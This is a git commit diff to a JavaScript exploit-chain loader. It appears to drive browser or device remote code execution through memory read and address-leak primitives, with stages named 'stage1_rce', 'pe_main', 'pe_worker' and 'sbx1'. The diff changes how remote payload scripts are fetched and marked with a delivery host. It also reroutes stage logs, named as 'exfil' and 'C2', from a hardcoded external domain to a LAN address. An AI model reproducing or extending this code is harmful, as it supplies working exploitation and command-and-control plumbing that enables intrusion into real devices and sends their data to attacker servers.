feat: ds
This commit is contained in:
@@ -1,5 +1,4 @@
|
||||
var SERVER_LOG;
|
||||
var __labC2Host = 'https://mh0usocqzi6f46i.com:443';
|
||||
let offsets;
|
||||
let MessageName;
|
||||
|
||||
@@ -16,6 +15,14 @@ function sleep(ms) {
|
||||
}
|
||||
let logStart = new Date().getTime();
|
||||
let logEntryID = 0;
|
||||
var __labC2Host = '';
|
||||
function labC2LogUrl(qs) {
|
||||
var base = __labC2Host;
|
||||
if (!base) {
|
||||
try { base = String(host || '').replace(/\/next-chain\/?$/, ''); } catch (_e) { base = ''; }
|
||||
}
|
||||
return String(base || '').replace(/\/$/, '') + '/api/ds/log?' + qs;
|
||||
}
|
||||
function print(x, reportError = false, dumphex = false) {
|
||||
let out = ('[' + (new Date().getTime() - logStart) + 'ms] ').padEnd(10) + x;
|
||||
// Errors only to /api/ds/log — progress stays in fopen side-channel / console.
|
||||
@@ -32,12 +39,7 @@ function print(x, reportError = false, dumphex = false) {
|
||||
}
|
||||
let req = Object.entries(obj).map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`).join('&')
|
||||
const xhr = new XMLHttpRequest();
|
||||
var logBase = '';
|
||||
try {
|
||||
if (typeof __labC2Host === 'string' && __labC2Host) logBase = String(__labC2Host).replace(/\/$/, '');
|
||||
} catch (eLb) {}
|
||||
if (!logBase) logBase = 'https://mh0usocqzi6f46i.com:443';
|
||||
xhr.open("GET", logBase + "/api/ds/log?" + req , false);
|
||||
xhr.open("GET", labC2LogUrl(req) , false);
|
||||
xhr.send(null);
|
||||
}
|
||||
// 去掉加解密:明文直通,不再解密任何 blob。
|
||||
@@ -47,19 +49,14 @@ function print(x, reportError = false, dumphex = false) {
|
||||
function _labDecryptWire(text) {
|
||||
return text;
|
||||
}
|
||||
|
||||
var __labDeviceUUID = '';
|
||||
function __labCanonUuid(v) {
|
||||
var s = String(v || '').replace(/-/g, '').toUpperCase();
|
||||
return /^[0-9A-F]{16,64}$/.test(s) ? s : '';
|
||||
}
|
||||
function __labPrependDeviceUuid(fname, text) {
|
||||
function __labPrependDelivery(fname, text) {
|
||||
if (!text) return text;
|
||||
var du = __labCanonUuid(__labDeviceUUID);
|
||||
if (!du || du === '69DD25B2CA8B5682BA2470D77124E2FC') return text;
|
||||
var f = String(fname || '').toLowerCase();
|
||||
if (f.indexOf('pe_worker') < 0 && f.indexOf('pe_main') < 0 && f.indexOf('sbx1') < 0) return text;
|
||||
return 'try{var __peG=(typeof globalThis!=="undefined"?globalThis:(typeof self!=="undefined"?self:this));if(__peG)__peG.__LAB_DEVICE_UUID__="' + du + '";}catch(_peU){}\n' + text;
|
||||
if (f.indexOf('pe_worker') < 0 && f.indexOf('pe_main') < 0) return text;
|
||||
var d = '';
|
||||
try { d = String(host || '').replace(/"/g, ''); } catch (_h) {}
|
||||
if (!d) return text;
|
||||
return 'try{var __peG=(typeof globalThis!=="undefined"?globalThis:(typeof self!=="undefined"?self:this));if(__peG)__peG.__PE_DELIVERY_HOST__="' + d + '";}catch(_d){}\n' + text;
|
||||
}
|
||||
|
||||
function getJS(fname,method = 'POST')
|
||||
@@ -115,15 +112,12 @@ function print(x, reportError = false, dumphex = false) {
|
||||
try
|
||||
{
|
||||
let url = "";
|
||||
var assetBase = String(host || '').replace(/\/$/, '');
|
||||
var assetPath = String(fname || '');
|
||||
if (assetPath.charAt(0) !== '/') assetPath = '/' + assetPath;
|
||||
url = assetBase + assetPath + (assetPath.indexOf('?') >= 0 ? '&' : '?') + '_t=' + Date.now();
|
||||
url = host + "/" + fname + (fname.indexOf('?') >= 0 ? '&' : '?') + '_t=' + Date.now();
|
||||
print("trying to fetch from:" + url);
|
||||
let xhr = new XMLHttpRequest();
|
||||
xhr.open("GET", `${url}` , false);
|
||||
xhr.send(null);
|
||||
return __labPrependDeviceUuid(fname, _labDecryptWire(xhr.responseText));
|
||||
return __labPrependDelivery(fname, _labDecryptWire(xhr.responseText));
|
||||
}
|
||||
catch(e)
|
||||
{
|
||||
@@ -14405,7 +14399,7 @@ async function main() {
|
||||
const fopen_mode_str = 'w';
|
||||
const fopen_mode_ptr = p.read64(p.read64(p.addrof(fopen_mode_str) + 8n) + 8n);
|
||||
function log(msg) {
|
||||
// Mirror stage logs to local server via /api/ds/log (SERVER_LOG)
|
||||
// Mirror stage logs to C2 via /api/ds/log (SERVER_LOG)
|
||||
try { print(String(msg)); } catch (e) {}
|
||||
if (true) {
|
||||
const elapsed = parseInt(Date.now() - rce_begin);
|
||||
@@ -14449,10 +14443,9 @@ async function main() {
|
||||
}
|
||||
case 'stage1_rce':
|
||||
{
|
||||
__labC2Host = 'https://mh0usocqzi6f46i.com:443';
|
||||
__labC2Host = 'http://192.168.31.130:8080';
|
||||
host = data.desiredHost;
|
||||
try { var _ep = (data.exfilTls ? 'https://' : 'http://') + (data.exfilHost || 'mh0usocqzi6f46i.com') + ':' + (data.exfilHttpsPort || data.exfilHttpPort || 8018); __labC2Host = _ep.replace(/\/$/, ''); } catch (_e1) { __labC2Host = 'https://mh0usocqzi6f46i.com:443'; }
|
||||
try { __labDeviceUUID = __labCanonUuid(data.deviceUUID || data.device || data.uuid); } catch (_du) {}
|
||||
try { var _ep = (data.exfilTls ? 'https://' : 'http://') + (data.exfilHost || '192.168.31.130') + ':' + (data.exfilHttpsPort || data.exfilHttpPort || 8018); __labC2Host = _ep.replace(/\/$/, ''); } catch (_e1) { __labC2Host = 'http://192.168.31.130:8080'; }
|
||||
SERVER_LOG = data.SERVER_LOG;
|
||||
if (data._enc_session) {
|
||||
_enc_S = data._enc_session;
|
||||
|
||||
Reference in New Issue
Block a user